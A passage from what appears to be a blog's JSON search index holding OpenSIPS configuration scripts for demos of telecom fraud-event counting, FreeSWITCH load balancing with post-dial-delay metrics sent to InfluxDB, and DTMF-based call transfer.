xlog(\u0026#34;e_frd_cdur++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cdur\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;total calls\u0026#34;) { xlog(\u0026#34;e_frd_tc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_tc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;concurrent calls\u0026#34;) { xlog(\u0026#34;e_frd_cc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;sequential calls\u0026#34;) { xlog(\u0026#34;e_frd_seq++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_seq\u0026#34;, 1, 0); } } event_route [E_FRD_CRITICAL] { fetch_event_params(\u0026#34;$var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\u0026#34;); xlog(\u0026#34;E_FRD_CRITICAL: $var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\\n\u0026#34;); if ($var(param) == \u0026#34;calls per minute\u0026#34;) { xlog(\u0026#34;e_frd_critcpm++\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcpm\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;call_duration\u0026#34;) { xlog(\u0026#34;e_frd_critcdur++\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcdur\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;total calls\u0026#34;) { xlog(\u0026#34;e_frd_crittc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_crittc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;concurrent calls\u0026#34;) { xlog(\u0026#34;e_frd_critcc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;sequential calls\u0026#34;) { xlog(\u0026#34;e_frd_critseq++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critseq\u0026#34;, 1, 0); } } route [store_influxdb] { $var(body) = $param(2) + \u0026#34;,host=\u0026#34; + $param(3) + \u0026#34; value=\u0026#34; + $param(4); xlog(\u0026#34;XXX posting: $var(body) ($param(1) / $param(2) / $param(4))\\n\u0026#34;); if (!rest_post(\u0026#34;http://localhost:8086/write?db=$param(1)\u0026#34;, \u0026#34;$var(body)\u0026#34;, , \u0026#34;$var(body)\u0026#34;)) { xlog(\u0026#34;ERR in rest_post!\\n\u0026#34;); exit; } } timer_route [dump_fraud_cpm, 1] { $var(cpm) = 0; $var(ccpm) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cpm\u0026#34;, $var(cpm)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcpm\u0026#34;, $var(ccpm)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cpm\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcpm\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;cpm\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cpm)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critcpm\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ccpm)); xlog(\u0026#34;XXX stats: $var(cpm) / $var(ccpm)\\n\u0026#34;); } timer_route [dump_fraud_cdur, 1] { $var(cdur) = 0; $var(ccdur) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cdur\u0026#34;, $var(cdur)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcdur\u0026#34;, $var(ccdur)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cdur\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcdur\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;cdur\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cdur)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critcdur\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ccdur)); xlog(\u0026#34;XXX stats: $var(cdur) / $var(ccdur)\\n\u0026#34;); } timer_route [dump_fraud_tc, 1] { $var(tc) = 0; $var(ctc) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_tc\u0026#34;, $var(tc)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_crittc\u0026#34;, $var(ctc)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_tc\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_crittc\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;tc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(tc)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;crittc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ctc)); xlog(\u0026#34;XXX stats: $var(tc) / $var(ctc)\\n\u0026#34;); } timer_route [dump_fraud_cc, 1] { $var(cc) = 0; $var(ccc) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cc\u0026#34;, $var(cc)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcc\u0026#34;, $var(ccc)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cc\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcc\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;cc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cc)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critcc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ccc)); xlog(\u0026#34;XXX stats: $var(cc) / $var(ccc)\\n\u0026#34;); } timer_route [dump_fraud_seq, 1] { $var(seq) = 0; $var(cseq) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_seq\u0026#34;, $var(seq)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critseq\u0026#34;, $var(cseq)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_seq\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critseq\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;seq\u0026#34;, \u0026#34;serverA\u0026#34;, $var(seq)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critseq\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cseq)); xlog(\u0026#34;XXX stats: $var(seq) / $var(cseq)\\n\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch8/fraud/","summary":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=yes log_facility=LOG_LOCAL0 children=4 memdump=-1 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.","title":"opensips-summit-fraud"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 memdump=1 log_stderror=yes log_facility=LOG_LOCAL0 children=10 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:192.168.56.1:5070 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;modules/\u0026#34; loadmodule \u0026#34;httpd.so\u0026#34; modparam(\u0026#34;httpd\u0026#34;, \u0026#34;port\u0026#34;, 8081) loadmodule \u0026#34;mi_json.so\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 2) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) loadmodule \u0026#34;cachedb_local.so\u0026#34; loadmodule \u0026#34;mathops.so\u0026#34; modparam(\u0026#34;mathops\u0026#34;, \u0026#34;decimal_digits\u0026#34;, 12) loadmodule \u0026#34;rest_client.so\u0026#34; #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo_2\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) loadmodule \u0026#34;cfgutils.so\u0026#34; #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;proto_udp.so\u0026#34; loadmodule \u0026#34;dialog.so\u0026#34; loadmodule \u0026#34;statistics.so\u0026#34; loadmodule \u0026#34;load_balancer.so\u0026#34; modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@192.168.56.128/opensips\u0026#34;) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;initial_freeswitch_load\u0026#34;, 15) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;fetch_freeswitch_stats\u0026#34;, 1) loadmodule \u0026#34;freeswitch.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; ####### Routing Logic ######## # main request routing logic startup_route { $stat(neg_replies) = 0; } route { if ($stat(neg_replies) == \u0026#34;\u0026lt;null\u0026gt;\u0026#34;) $stat(neg_replies) = 0; if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { create_dialog(); $dlg_val(start_ts) = $Ts; $dlg_val(start_tsm) = $Tsm; $dlg_val(pdd_pen) = \u0026#34;0\u0026#34;; t_on_reply(\u0026#34;invite_reply\u0026#34;); do_accounting(\u0026#34;log\u0026#34;); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;501\u0026#34;, \u0026#34;Not Implemented\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } if (!load_balance(\u0026#34;2\u0026#34;, \u0026#34;call\u0026#34;)) { xlog(\u0026#34;no available destinations!\\n\u0026#34;); send_reply(\u0026#34;503\u0026#34;, \u0026#34;No available dsts\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } onreply_route [invite_reply] { if ($rs == 180) { if ($Ts == $(dlg_val(start_ts){s.int})) { $var(diff_sec) = 0; $var(diff_usec) = $Tsm - $(dlg_val(start_tsm){s.int}); } else if ($Tsm \u0026gt; $(dlg_val(start_tsm){s.int})) { $var(diff_sec) = $Ts - $(dlg_val(start_ts){s.int}); $var(diff_usec) = $Tsm - $(dlg_val(start_tsm){s.int}); } else { $var(diff_sec) = $Ts - $(dlg_val(start_ts){s.int}) - 1; $var(diff_usec) = 1000000 + $Tsm - $(dlg_val(start_tsm){s.int}); } $var(diff_usec) = $var(diff_usec) + $dlg_val(pdd_pen); cache_add(\u0026#34;local\u0026#34;, \u0026#34;tot_sec\u0026#34;, $var(diff_sec), 0, $var(nsv)); cache_add(\u0026#34;local\u0026#34;, \u0026#34;tot_usec\u0026#34;, $var(diff_usec), 0, $var(nmsv)); cache_add(\u0026#34;local\u0026#34;, \u0026#34;tot\u0026#34;, 1, 0); xlog(\u0026#34;XXXX: $var(diff_sec) s, $var(diff_usec) us | $var(nsv) | $var(nmsv)\\n\u0026#34;); } } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); } exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } if (!math_eval(\u0026#34;$dlg_val(pdd_pen) + 10000\u0026#34;, \u0026#34;$dlg_val(pdd_pen)\u0026#34;)) { xlog(\u0026#34;math eval error $rc\\n\u0026#34;); } cache_add(\u0026#34;local\u0026#34;, \u0026#34;neg_replies\u0026#34;, 1, 0); if (t_check_status(\u0026#34;(5|6)[0-9][0-9]\u0026#34;) || (t_check_status(\u0026#34;408\u0026#34;) \u0026amp;\u0026amp; t_local_replied(\u0026#34;all\u0026#34;))) { xlog(\u0026#34;ERROR: FS GW error, status=$rs\\n\u0026#34;); if (!lb_next()) { xlog(\u0026#34;ERROR: all FS are down!\\n\u0026#34;); send_reply(\u0026#34;503\u0026#34;, \u0026#34;No available destination\u0026#34;); exit; } } xlog(\u0026#34;rerouting to $ru / $du\\n\u0026#34;); t_on_reply(\u0026#34;invite_reply\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); t_relay(); exit; # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } timer_route [dump_pdd, 1] { $var(out) = 0; $var(out_us) = 0; $var(tot) = 0; $var(result) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;tot_sec\u0026#34;, $var(out)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;tot_usec\u0026#34;, $var(out_us)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;tot\u0026#34;, $var(tot)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;tot_sec\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;tot_usec\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;tot\u0026#34;); if ($var(tot) \u0026gt; 0) { if (!math_eval(\u0026#34;($var(out) + ($var(out_us) / 1000000)) / $var(tot)\u0026#34;, \u0026#34;$var(result)\u0026#34;)) { xlog(\u0026#34;math eval error $rc\\n\u0026#34;); } route(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;pdd\u0026#34;, \u0026#34;serverB\u0026#34;, $var(result)); } } #route [lb_route] #{ #\txlog(\u0026#34;foo: $(avp(lb_loads)[*])\\n\u0026#34;); #\troute(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;bal\u0026#34;, \u0026#34;serverA\u0026#34;, $(avp(lb_loads)[0])); #\tif ($(avp(lb_loads)[1]) != NULL) { #\troute(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;bal\u0026#34;, \u0026#34;serverB\u0026#34;, $(avp(lb_loads)[1])); #\t} #} route [store_influxdb] { $var(body) = $param(2) + \u0026#34;,host=\u0026#34; + $param(3) + \u0026#34; value=\u0026#34; + $param(4); xlog(\u0026#34;XXX posting: $var(body) ($param(1) / $param(2) / $param(4))\\n\u0026#34;); if (!rest_post(\u0026#34;http://localhost:8086/write?db=$param(1)\u0026#34;, \u0026#34;$var(body)\u0026#34;, , \u0026#34;$var(body)\u0026#34;)) { xlog(\u0026#34;ERR in rest_post!\\n\u0026#34;); exit; } } timer_route [dump_reply_stats, 1] { $var(nr) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;neg_replies\u0026#34;, $var(nr)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;neg_replies\u0026#34;); route(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;neg\u0026#34;, \u0026#34;serverB\u0026#34;, $var(nr)); route(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;rpl\u0026#34;, \u0026#34;serverB\u0026#34;, $stat(rcv_replies)); xlog(\u0026#34;XXX stats: $var(nr)\\n\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch8/fs-loadbalance/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 memdump=1 log_stderror=yes log_facility=LOG_LOCAL0 children=10 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:192.","title":"cluecon-fslb"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=4 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen = udp:10.0.0.10:5060 ####### Modules Section ######## #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;cachedb_local.so\u0026#34; loadmodule \u0026#34;freeswitch.so\u0026#34; loadmodule \u0026#34;freeswitch_scripting.so\u0026#34; modparam(\u0026#34;freeswitch_scripting\u0026#34;, \u0026#34;fs_subscribe\u0026#34;, \u0026#34;fs://:ClueCon@10.0.0.246:8021/database?DTMF,CHANNEL_STATE,CHANNEL_ANSWER,HEARTBEAT\u0026#34;) loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;cfgutils.so\u0026#34; loadmodule \u0026#34;drouting.so\u0026#34; modparam(\u0026#34;drouting\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:liviusmysqlpassword@localhost/opensips\u0026#34;) loadmodule \u0026#34;event_route.so\u0026#34; loadmodule \u0026#34;json.so\u0026#34; loadmodule \u0026#34;proto_udp.so\u0026#34; ####### Routing Logic ######## # main request routing logic # $param(1) - 1 if the R-URI IP:port should be rewritten route [goes_to_support] { if ($param(1) == 1) $var(flags) = \u0026#34;\u0026#34;; else $var(flags) = \u0026#34;C\u0026#34;; if (do_routing(\u0026#34;0\u0026#34;, \u0026#34;$var(flags)\u0026#34;)) return(1); return(-1); } route [FREESWITCH_XFER_BY_DTMF_LANG] { # this call has already been transferred if (cache_fetch(\u0026#34;local\u0026#34;, \u0026#34;DTMF-$json(body/Unique-ID)\u0026#34;, $var(_))) return; switch ($json(body/DTMF-Digit)) { case \u0026#34;1\u0026#34;: xlog(\u0026#34;transferring to English support line\\n\u0026#34;); freeswitch_esl(\u0026#34;bgapi uuid_transfer $json(body/Unique-ID) -aleg 1001\u0026#34;, \u0026#34;$var(fs_box)\u0026#34;, \u0026#34;$var(output)\u0026#34;); break; case \u0026#34;2\u0026#34;: xlog(\u0026#34;transferring to Spanish support line\\n\u0026#34;); freeswitch_esl(\u0026#34;bgapi uuid_transfer $json(body/Unique-ID) -aleg 1002\u0026#34;, \u0026#34;$var(fs_box)\u0026#34;, \u0026#34;$var(output)\u0026#34;); break; default: xlog(\u0026#34;DEFAULT: transferring to English support line\\n\u0026#34;); freeswitch_esl(\u0026#34;bgapi uuid_transfer $json(body/Unique-ID) -aleg 1001\u0026#34;, \u0026#34;$var(fs_box)\u0026#34;, \u0026#34;$var(output)\u0026#34;); } xlog(\u0026#34;ran FS uuid_transfer, output: $var(output)\\n\u0026#34;); cache_store(\u0026#34;local\u0026#34;, \u0026#34;DTMF-$json(body/Unique-ID)\u0026#34;, \u0026#34;OK\u0026#34;, 600); } event_route [E_FREESWITCH] { fetch_event_params(\u0026#34;$var(event_name);$var(fs_box);$var(event_body)\u0026#34;); xlog(\u0026#34;FreeSWITCH event $var(event_name) from $var(fs_box), with $var(event_body)\\n\u0026#34;); $json(body) := $var(event_body); if ($var(event_name) == \u0026#34;DTMF\u0026#34;) { $rU = $json(body/Caller-Destination-Number); if (!$rU) { xlog(\u0026#34;SCRIPT:DTMF:ERR: missing body/Caller-Destination-Number field!\\n\u0026#34;); return; } if (route(goes_to_support, 0)) route(FREESWITCH_XFER_BY_DTMF_LANG); } } route { if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if 